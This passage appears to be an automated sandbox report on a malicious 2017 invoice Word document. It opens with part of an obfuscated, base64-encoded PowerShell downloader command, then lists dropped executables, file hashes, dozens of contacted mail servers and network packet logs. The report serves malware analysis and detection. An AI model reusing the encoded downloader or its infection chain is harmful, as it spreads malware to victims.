NAAzACwAMwAyACAALAAgADMAOQAsACAAOQAyACwAIAAzADkAIAAsADMAMgAsADQAMwAgACwAIAAzADIALAAzADYAIAAsACAAMQAxADAALAAgADkANwAsADEAMAA5ACAALAAxADAAMQAsADMAMgAgACwAIAA0ADMALAAzADIAIAAsACAAMwA5ACAALAAgADQANgAgACwAMQAwADEAIAAsADEAMgAwACAALAAxADAAMQAsADMAOQAsACAANQA5ACwAMQAwADIAIAAsACAAMQAxADEAIAAsACAAMQAxADQALAAxADAAMQAgACwAOQA3ACwAOQA5ACAALAAxADAANAAgACwAIAA0ADAAIAAsADMANgAgACwAMQAxADcAIAAsACAAMQAxADQAIAAsADEAMAA4ACwAIAAzADIAIAAsADEAMAA1ACAALAAxADEAMAAgACwAIAAzADIALAAzADYALAAgADEAMQA3ACAALAAxADEANAAgACwAIAAxADAAOAAgACwAIAAxADEANQAsADQAMQAgACwAMQAyADMAIAAsADEAMQA2ACAALAAgADEAMQA0ACAALAAgADEAMgAxACAALAAgADEAMgAzACwAMwA2ACwAIAAxADEAOQAgACwAIAAxADAAMQAgACwAIAA5ADgAIAAsADkAOQAsADEAMAA4ACAALAAxADAANQAgACwAMQAwADEAIAAsACAAMQAxADAAIAAsADEAMQA2ACwANAA2ACwANgA4ACwAMQAxADEALAAxADEAOQAgACwAIAAxADEAMAAgACwAMQAwADgAIAAsADEAMQAxACAALAA5ADcAIAAsACAAMQAwADAALAA3ADAALAAgADEAMAA1ACAALAAxADAAOAAgACwAIAAxADAAMQAgACwAIAA0ADAALAAzADYALAAgADEAMQA3ACwAMQAxADQAIAAsACAAMQAwADgAIAAsACAANAA2ACwAIAA4ADQALAAgADEAMQAxACAALAA4ADMAIAAsACAAMQAxADYAIAAsACAAMQAxADQALAAxADAANQAsADEAMQAwACwAIAAxADAAMwAsADQAMAAgACwAIAA0ADEALAA0ADQAIAAsADMAMgAgACwAIAAzADYALAAxADEAMgAsACAAOQA3ACwAMQAxADYAIAAsADEAMAA0ACAALAA0ADEAIAAsACAANQA5ACAALAAgADgAMwAsADEAMQA2ACwAIAA5ADcALAAgADEAMQA0ACAALAAxADEANgAsACAANAA1ACwAIAA4ADAAIAAsACAAMQAxADQALAAgADEAMQAxACwAIAA5ADkAIAAsADEAMAAxACwAIAAxADEANQAgACwAIAAxADEANQAsACAAMwAyACAALAAgADMANgAgACwAMQAxADIAIAAsADkANwAgACwAIAAxADEANgAsACAAMQAwADQALAA1ADkALAA5ADgAIAAsADEAMQA0ACAALAAgADEAMAAxACAALAA5ADcALAAxADAANwAgACwAIAA1ADkAIAAsACAAMQAyADUAIAAsADkAOQAgACwAOQA3ACwAIAAxADEANgAsACAAOQA5ACwAMQAwADQALAAgADEAMgAzACAALAAgADEAMQA5ACwAIAAxADEANAAsACAAMQAwADUAIAAsACAAMQAxADYAIAAsADEAMAAxACwAIAA0ADUAIAAsADEAMAA0ACwAMQAxADEAIAAsACAAMQAxADUAIAAsACAAMQAxADYALAAzADIALAAgADMANgAgACwAOQA1ACwAIAA0ADYAIAAsACAANgA5ACAALAAxADIAMAAgACwAIAA5ADkALAAxADAAMQAgACwAIAAxADEAMgAgACwAMQAxADYAIAAsACAAMQAwADUALAAxADEAMQAgACwAMQAxADAAIAAsACAANAA2ACwAIAA3ADcAIAAsADEAMAAxACAALAAxADEANQAgACwAIAAxADEANQAgACwAOQA3ACwAMQAwADMALAAxADAAMQAgACwANQA5ACAALAAxADIANQAsACAAMQAyADUAIAApACAAfAAgACUAIAB7ACAAKAAgAFsAQwBIAEEAUgBdAFsASQBOAHQAXQAgACQAXwApAH0AIAApACAALQBKAE8ASQBuACcAJwApAA== MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • 16994.exe (PID: 3604 cmdline: 'C:\Users\user~1\AppData\Local\Temp\16994.exe' MD5: 50A739402E5E3BEA670F12D0DEC077CD)
          • 16994.exe (PID: 3632 cmdline: C:\Users\user~1\AppData\Local\Temp\16994.exe MD5: 50A739402E5E3BEA670F12D0DEC077CD)
  • OSPPSVC.EXE (PID: 3472 cmdline: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE MD5: 358A9CCA612C68EB2F07DDAD4CE1D8D7)
  • helphome.exe (PID: 3664 cmdline: C:\Windows\system32\helphome.exe MD5: 50A739402E5E3BEA670F12D0DEC077CD)
    • helphome.exe (PID: 3688 cmdline: C:\Windows\system32\helphome.exe MD5: 50A739402E5E3BEA670F12D0DEC077CD)
      • LLocMy8gfC0E0xG3.exe (PID: 3740 cmdline: C:\Windows\system32\LLocMy8gfC0E0xG3.exe MD5: D65519BCE4A9141B104D3D35444F2C25)
        • LLocMy8gfC0E0xG3.exe (PID: 3748 cmdline: C:\Windows\system32\LLocMy8gfC0E0xG3.exe MD5: D65519BCE4A9141B104D3D35444F2C25)
  • helphome.exe (PID: 3788 cmdline: C:\Windows\system32\helphome.exe MD5: D65519BCE4A9141B104D3D35444F2C25)
    • helphome.exe (PID: 3808 cmdline: C:\Windows\system32\helphome.exe MD5: D65519BCE4A9141B104D3D35444F2C25)
      • helphome.exe (PID: 3996 cmdline: 'C:\Windows\system32\helphome.exe' 'C:\ProgramData\C5E3.tmp' MD5: D65519BCE4A9141B104D3D35444F2C25)
      • helphome.exe (PID: 4004 cmdline: 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E2.tmp' MD5: D65519BCE4A9141B104D3D35444F2C25)
      • helphome.exe (PID: 4012 cmdline: 'C:\Windows\system32\helphome.exe' /scomma 'C:\ProgramData\C5E1.tmp' MD5: D65519BCE4A9141B104D3D35444F2C25)
  • WmiApSrv.exe (PID: 2440 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 6EB6B66517B048D87DC1856DDF1F4C3F)
  • cleanup

Created / dropped Files

C:\ProgramData\C5E2.tmp
File Type:ASCII text, with CRLF line terminators
MD5:36427ECB2A0FAF13AF3047C51B29F9C5
SHA1:9A3FB26927A7AA81255CF8ABCC1F1C3E38F28C4F
SHA-256:EA156F649BB1180B32C6D5BE76C0969941EC76D1FFACE734F401B5327AC57345
SHA-512:4E1FF95C087545B9FE56BBC008516D1E0BBECD9CAE246D7BAECD7773404E24678EC22B515EC6E6F715081FD079E6D400AA4060ABAF9346CDC609873BE76833F0
Malicious:true
C:\ProgramData\Microsoft\OfficeSoftwareProtectionPlatform\Cache\cache.dat
File Type:data
MD5:B5B1F62D9292CC5D6940FBF24C5FF5AA
SHA1:4EA191131F85B133A15D44FBF1ED7D24A7AAB513
SHA-256:EED21ABD6E885EF62AF187CBE9C56F002A579AA1DFEC669F035A14D59ABADF09
SHA-512:50931A2B432FA68966F5802B9FBEABAA60C8580776646F5BF547D283FE935C126E7B747D886E67BF333B40B0F894A7D3D32A57AE147A45AF1D4D4287A86532B3
Malicious:false
C:\Users\user~1\AppData\Local\Temp\bhvD070.tmp
File Type:empty
MD5:D41D8CD98F00B204E9800998ECF8427E
SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2C258AC9-D6A6-4139-A9C9-1E96046451E0}.tmp
File Type:data
MD5:5D4D94EE7E06BBB0AF9584119797B23A
SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:false
C:\Users\user\AppData\Local\Temp\16994.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:50A739402E5E3BEA670F12D0DEC077CD
SHA1:7A1635576AFB5FA02EB60CC75C18D6A7826FE3BB
SHA-256:0A501F5519E03E55E3EB20E798B455EEBA2CEBE434B384CA46C729DC4A77CE3D
SHA-512:16AB21C2B65ABA168FC28E97888B43019EE6C350D99FAD14DC3D1DD26E2EB5106009EF72C025E5284B5BFA809B5DBB55D6CCC48A28F2F6494BFB39C454B34D05
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Client- 9650, Oct 2017 Invoice.LNK
File Type:MS Windows shortcut
MD5:50D9F844176AFA8BBD17A8A2AC2C479E
SHA1:285063B56E9D05BEDB38DF3C85C0BE919A445D19
SHA-256:8B2E2E7592430F64C927C966C362819CD7A6E0B8AA8EFB91ACAD7369BF0A326B
SHA-512:77104D7432B86EF66B26823E6F5766025A0E6105A687A86FBEB869547FA73ADB1A75E67B82A45FF2AD94AAB294017B9BA342BFE6DE747610EBBB9299EAA4D2DA
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
File Type:ASCII text, with CRLF line terminators
MD5:08A80280708863B4506837FAACA85F46
SHA1:FB3259066154195DBB82F15611E1EECF5626BB9D
SHA-256:21EFCA90057E9BDF67C0BB2F8DD23F3042CE31E9CC03C09E0F2470F1EA49B56F
SHA-512:2E3B80C7A88CC06C386D0CB133E0D392979C07D28167C8E1B9D4231C22B6AE51302EBF3566CDAE838BDC3184E1E29F0EB7E1602697B5D0E33B2245CF374DCADB
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
File Type:data
MD5:1D90D97BFA3FE2816EE63C8198DB5D4C
SHA1:CA4D125603E8C234D7E221BD855D3CAA5652C00E
SHA-256:43572381D058FB6B68316500768780CD3F40EE9729BE95D53FDE43A70340330C
SHA-512:FF37E75CED4AA143CC7BDA55DA8BD3369C83F83671C3D9B2995EA727B3A067362AE6C26B4440756443CE34869620CF4B8036E69B5AB70A0DAEDDAE65B29F627F
Malicious:false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UEJBGD6D3VBSS23G9PZW.temp
File Type:data
MD5:D58DCD644E46D26AE88F4DFD429DF0D4
SHA1:C895736208FC6DDF06D56F637A7A5725109D3D73
SHA-256:165CB3DCB3C648017771809123D03122174F3CDD4E5D51439F15048421660434
SHA-512:0DDF62E686F199FB415687DBB8FC6A066D47C7C3BD4DFD9D56652213411C1B30273A543DAC1FC1FB3FCF2167EC4423058B51773CFE27163FFD6C97B25FAE7EF2
Malicious:false
C:\Users\user\Desktop\download\Client- 9650, Oct 2017 Invoice.doc
File Type:CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: LohlUqpj, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 16 19:19:00 2017, Last Saved Time/Date: Mon Oct 16 19:19:00 2017, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:31E3DF0FC53C3243925D6F7D5D2D542A
SHA1:D28B0FD2998EC81AF428A8BBB38745129653A511
SHA-256:BEFFFCACDF0A332761313F820C7527C9E18AFB0B2B96871FA3AE6CDB78A1710C
SHA-512:940FDE7335C372D80FC47D3EBBA69688238D46B8675784587E8D1D2859563E67E609392CA1A015A9822F2BC027D272D4E499E8DE5D9A00C88219146B50CCD33D
Malicious:true
C:\Users\user\Desktop\download\~$ient- 9650, Oct 2017 Invoice.doc
File Type:data
MD5:1D90D97BFA3FE2816EE63C8198DB5D4C
SHA1:CA4D125603E8C234D7E221BD855D3CAA5652C00E
SHA-256:43572381D058FB6B68316500768780CD3F40EE9729BE95D53FDE43A70340330C
SHA-512:FF37E75CED4AA143CC7BDA55DA8BD3369C83F83671C3D9B2995EA727B3A067362AE6C26B4440756443CE34869620CF4B8036E69B5AB70A0DAEDDAE65B29F627F
Malicious:false
C:\Windows\System32\LLocMy8gfC0E0xG3.exe
File Type:PE32 executable for MS Windows (GUI) Intel 80386 32-bit
MD5:D65519BCE4A9141B104D3D35444F2C25
SHA1:D3B466D8F7DD956AE0FAAED924ED1DC90CC16D73
SHA-256:2B684B5DCFC721F698FDC8C4E4631952FB29B8D0C5682081E8B9B60458BC49FE
SHA-512:1F6001B3E2C1E6EBFC5696AC08D141A373E40E653E2BBBE8538DE44D4D803DB51127C623D69B97653C8B9B06E97FFAD7095D21CC798AB185C6671D703152D75F
Malicious:true

Contacted Domains/Contacted IPs

Contacted Domains

NameIPActiveMaliciousAntivirus Detection
smtp.ok.de88.198.199.114truefalse
mail5.hostmaster.sk46.229.230.234truefalse
ssl0.ovh.net213.186.33.20truetrue
smtp.wp.pl212.77.101.1truetrue
smtp.tele2.at213.90.36.113truefalse
mx1.kabsi.at195.202.128.4truefalse
mail.mediaserve.de82.207.178.23truefalse
smtpout.secureserver.net173.201.192.101truetrue
dug-service.de81.169.145.164truetrue
e24.ehosts.com108.167.137.14truefalse
mail.idnet.eu217.76.224.5truefalse
austinfilmschool.org184.175.109.73truefalse
virtual1.mx.freenet.de195.4.92.211truetrue
service3.xmobile-services.at193.110.129.149truefalse
zobelei.de85.13.152.217truetrue
dd29902.kasserver.com85.13.128.99truefalse
mail.active24.pl195.78.67.24truetrue
smtp.t-2.net84.255.208.30truefalse
mail.o2mail.de91.136.8.189truefalse
patricia.xoc.tele2net.at213.90.36.9truetrue
smtp.outlook.com40.101.43.178truefalse
smtp.world4you.com81.19.149.200truetrue
ns0.ovh.net213.186.33.155truetrue
poczta.interia.pl217.74.64.236truefalse
virtual0.mx.freenet.de195.4.92.210truefalse
pop.loomes.net217.119.50.35truetrue
host4.ssl-gesichert.at213.145.228.17truetrue
smtp.gmail.com74.125.205.108truefalse
mail.zered.at85.124.51.105truefalse
mailc40.carrierzone.com64.29.151.235truetrue
mail.apanet.at194.232.25.64truefalse
mail.obx.de91.106.125.115truefalse
w00b4087.kasserver.com85.13.134.71truetrue
send.one.com91.198.169.21truetrue
zlc-aa.org209.59.172.114truetrue
smtp.majordomo.ru78.108.80.162truefalse
star.gd-net.pl195.250.38.66truetrue
smtp.liwest.at212.33.55.20truetrue
mx01.inxenio.com94.23.80.86truefalse
friends.zgoda.net193.17.223.40truefalse
mail.arcor.de153.92.65.114truefalse
smtp.poczta.onet.pl213.180.147.145truefalse
smtp.live.com40.101.48.82truetrue
smtp.blys.eu94.152.8.23truefalse
lb-proxy-16.websupport.sk37.9.169.18truetrue

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPCountryFlagASNASN NameMalicious
91.136.8.189United Kingdom
9115INFB-AS9115GBfalse
94.23.80.86France
16276OVHFRfalse
194.232.25.64Austria
5403AS5403ATfalse
40.101.43.178United States
8075MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUSfalse
108.167.137.14United States
20013CYRUSONE-CyrusOneLLCUSfalse
85.124.51.105Austria
6830LGI-UPCformerlyknownasUPCBroadbandHoldingBVATfalse
74.125.205.108United States
15169GOOGLE-GoogleIncUSfalse
81.169.145.164Germany
6724STRATOSTRATOAGDEtrue
78.108.80.162Russian Federation
43362MAJORDOMORUfalse
213.90.36.9Austria
8437UTA-ASATtrue
84.255.208.30Slovenia
34779T-2-ASASsetpropagatedbyT-2dooSIfalse
193.110.129.149Austria
24708GRZ-ATfalse
173.201.192.101United States
26496AS-26496-GO-DADDY-COM-LLC-GoDaddycomLLCUStrue
217.74.64.236Poland
16138INTERIAPLfalse
195.4.92.210Germany
5430FREENETDEfreenetDatenkommunikationsGmbHDEfalse
217.119.50.35Germany
8972PLUSSERVER-ASDEtrue
5.196.73.150France
16276OVHFRfalse
212.33.55.20Austria
12605LIWEST-ATLinzAustriaATtrue
37.9.169.18Slovakia (SLOVAK Republic)
51013WEBSUPPORT-SRO-SK-ASSKtrue
184.175.109.73United States
7393CYBERCON-CYBERCONINCUSfalse
213.145.228.17Austria
25575DOMAINTECHNIKATtrue
85.13.152.217Germany
34788NMM-ASD-02742Friedersdorf_Hauptstrasse68DEtrue
195.4.92.211Germany
5430FREENETDEfreenetDatenkommunikationsGmbHDEtrue
85.13.128.99Germany
34788NMM-ASD-02742Friedersdorf_Hauptstrasse68DEfalse
153.92.65.114Germany
60664X-IONDEfalse
93.180.157.92Germany
20773HOSTEUROPE-ASDEfalse
217.76.224.5Belgium
5488BELGACOMBEfalse
40.101.48.82United States
8075MICROSOFT-CORP-MSN-AS-BLOCK-MicrosoftCorporationUStrue
94.152.8.23Poland
29522KEIPLfalse
46.229.230.234Slovakia (SLOVAK Republic)
29405VNET-ASSKfalse
213.90.36.113Austria
8437UTA-ASATfalse
81.19.149.200Austria
38955WORLD4YOUATtrue
91.106.125.115Germany
12611RKOMR-KOMRegensburgerTelekommunikationsGmbHCoKGDEfalse
195.202.128.4Austria
8339KABSI-ASATfalse
64.29.151.235United States
30447INFB2-AS-InternetNamesForBusinesscomUStrue
213.186.33.20France
16276OVHFRtrue
193.17.223.40Poland
20804ASN-TELENERGOulPERKUNA47WARSZAWAPLfalse
85.13.134.71Germany
34788NMM-ASD-02742Friedersdorf_Hauptstrasse68DEtrue
88.198.199.114Germany
24940HETZNER-ASDEfalse
82.207.178.23Germany
8881VERSATELDEfalse
213.186.33.155France
16276OVHFRtrue
212.77.101.1Poland
12827WIRTUALNAPOLSKAGDANSKPolandPLtrue
91.198.169.21Denmark
51468ONECOMDKtrue
213.180.147.145Poland
12990ONET-PL-AS1OnetplportalnetworkPLfalse
195.78.67.24Poland
41499ACTIVE24-ASPLtrue
195.250.38.66Poland
202962OK360PLtrue
209.59.172.114United States
32244LIQUID-WEB-INC-LiquidWebLLCUStrue

Static File Info

No static file info

Network Behavior

Snort IDS Alerts

TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
10/17/17-21:54:32.270075TCP2011124ET MALWARE Suspicious FTP 220 Banner on Local Port (spaced)353549202173.201.192.101192.168.1.16

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Okt 17, 2017 21:53:38.028403997 MESZ5697553192.168.1.168.8.8.8
Okt 17, 2017 21:53:38.456110001 MESZ53569758.8.8.8192.168.1.16
Okt 17, 2017 21:53:38.463911057 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:38.463968039 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:38.464066982 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:38.465022087 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:38.465040922 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.484179974 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.492096901 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:39.492136002 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.912420988 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.912487030 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.912520885 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:39.912669897 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.040741920 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.040785074 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.040972948 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.047890902 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.047933102 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.047943115 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.048090935 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.173105001 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.173129082 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.173142910 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.173398972 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.173420906 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.180267096 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.180291891 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.180497885 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.180516958 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.311573982 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.311618090 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.311949015 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.311990023 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.349576950 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.349611998 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.349977016 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.350016117 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.434982061 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.435010910 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.435182095 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.435214996 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.475814104 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.475846052 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.476037025 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.476067066 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.564659119 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.564682961 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.564698935 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.564851999 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.564870119 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.604955912 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.604980946 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.605099916 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.605132103 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.695063114 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.695094109 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.695211887 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.695242882 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.735764027 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.735783100 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.735846043 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.735867977 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.736383915 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.736401081 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.736450911 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.736469984 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.825269938 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.825289965 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.825530052 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.825550079 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.871581078 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.871602058 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.871613026 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.871695042 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.871714115 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.956274033 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.956300020 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.956404924 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.956423998 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.957129955 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.957153082 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.957276106 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.957293034 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.997458935 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.997478008 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.997486115 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:40.997560978 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:40.997581005 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.087495089 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.087512970 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.087620974 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:41.087654114 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.094491959 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.094516993 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.094654083 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:41.094685078 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.128252029 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.128269911 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.128423929 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:41.128464937 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.217585087 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.217603922 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.217612028 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.217724085 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:41.263628960 MESZ8049190184.175.109.73192.168.1.16
Okt 17, 2017 21:53:41.267786026 MESZ4919080192.168.1.16184.175.109.73
Okt 17, 2017 21:53:57.750511885 MESZ5120853192.168.1.168.8.8.8
Okt 17, 2017 21:53:58.197060108 MESZ53512088.8.8.8192.168.1.16
Okt 17, 2017 21:53:58.237559080 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:58.237615108 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:58.238049984 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:58.257273912 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:58.257311106 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.048201084 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.048233032 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.048242092 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.048371077 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.157274961 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.178539991 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.178563118 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.178932905 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.178960085 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.181273937 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.181305885 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.185682058 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.185851097 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.185875893 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.289278030 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.289310932 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.289576054 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.289602041 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.309984922 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.310014009 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.310106993 MESZ4919180192.168.1.16209.59.172.114
Okt 17, 2017 21:53:59.310131073 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.314311981 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.314344883 MESZ8049191209.59.172.114192.168.1.16
Okt 17, 2017 21:53:59.314456940 MESZ4919180192.168.1.16209.59.172.114
